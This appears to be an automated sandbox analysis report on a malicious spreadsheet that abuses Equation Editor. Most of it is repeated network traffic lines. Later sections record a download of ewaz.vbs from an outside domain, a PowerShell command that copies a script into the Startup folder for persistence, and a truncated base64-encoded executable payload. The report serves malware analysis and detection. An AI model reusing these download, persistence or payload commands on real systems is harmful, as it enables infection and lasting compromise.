Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 190.90.160.170:443 -> 192.168.2.22:49183
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443
Source: global trafficTCP traffic: 192.168.2.22:49183 -> 190.90.160.170:443

Networking

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
Source: Joe Sandbox ViewASN Name: GTDCOLOMBIASASCO GTDCOLOMBIASASCO
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global trafficHTTP traffic detected: GET /laz/ewaz.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ayccubrimientos.comConnection: Keep-Alive
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_039860B9 URLDownloadToFileW,ShellExecuteW,ExitProcess,3_2_039860B9
Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.000000000033E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 0000000B.00000003.1118737043.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000003.1118657398.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 0000000B.00000003.1118737043.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner744C
Source: powershell.exe, 0000000B.00000003.1118657398.00000000006F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 0000000B.00000003.1118737043.00000000006CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerisp9
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ayccubrimientos.com/6
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ayccubrimientos.com/6xa62L~E
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.00000000002EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ayccubrimientos.com/laz/ewaz.vbs
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.00000000002EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ayccubrimientos.com/laz/ewaz.vbsiiC:
Source: EQNEDT32.EXE, 00000003.00000002.1087109037.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ewaz[1].vbsJump to behavior
Source: unknownDNS traffic detected: queries for: ayccubrimientos.com
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 3_2_039860B9 URLDownloadToFileW,ShellExecuteW,ExitProcess,3_2_039860B9
Source: global trafficHTTP traffic detected: GET /laz/ewaz.vbs HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ayccubrimientos.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 190.90.160.170:443 -> 192.168.2.22:49183 version: TLS 1.2

System Summary

barindex
Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\jyrthfdwrg.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ Wk.vbs')
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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